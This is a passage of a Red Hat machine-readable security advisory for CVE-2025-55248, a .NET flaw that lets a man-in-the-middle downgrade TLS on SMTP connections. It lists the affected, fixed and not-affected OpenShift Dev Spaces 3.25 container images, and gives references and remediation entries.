"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2403083"
}
],
"notes": [
{
"category": "description",
"text": "A flaw exists in certain .NET builds where a man-in-the-middle (MITM) attacker can prevent or downgrade TLS between a client and an SMTP server. This may cause the client to send credentials or message data over an unencrypted connection, exposing sensitive information to the attacker.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dotnet: .NET Information Disclosure Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The Red Hat Product Security team has assessed the severity of this vulnerability as High, given that it can be remotely exploited by a man-in-the-middle attacker without authentication or user interaction. Successful exploitation allows an attacker to disable TLS protection between a .NET client and an SMTP server, leading to exposure of credentials and message contents over an unencrypted connection. The vulnerability results from insufficient enforcement of TLS during SMTP session negotiation in the affected .NET runtime.\n\n```\n\n.NET 6.0 for RHEL-8, RHEL-9 and RHIVOS has reached its End of Life as of November 12, 2024, and is no longer supported. No fixes will be provided for this stream. For additional information about lifecycle for .NET on Red Hat Enterprise Linux, please refer to: https://access.redhat.com/support/policy/updates/net-core\u201d\n\n```",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-55248"
},
{
"category": "external",
"summary": "RHBZ#2403083",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403083"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-55248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-55248"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-55248",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55248"
}
],
"release_date": "2025-10-15T12:39:35.343000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
